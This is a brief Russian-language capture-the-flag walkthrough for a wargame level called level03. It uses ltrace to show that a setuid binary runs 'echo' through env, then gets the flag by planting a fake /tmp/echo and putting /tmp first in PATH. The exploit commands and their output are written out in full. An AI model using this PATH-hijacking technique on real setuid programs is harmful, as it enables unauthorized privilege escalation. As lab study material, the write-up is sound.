1) Имеем бинарник level03 в директории, пробуем запустить("Exploit me")
2) ltrace ./level03 

__libc_start_main(0x80484a4, 1, 0xbffff7f4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                                                                                                         = 2003
geteuid()                                                                                                                         = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280)                                                                               = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280)                                                                               = 0
system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                            = 0

3) Видим что используется echo из env
4) echo "/bin/getflag" > /tmp/echo
5) chmod +x /tmp/echo
6) export PATH=/tmp/:$PATH
7) Снова запускаем 
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus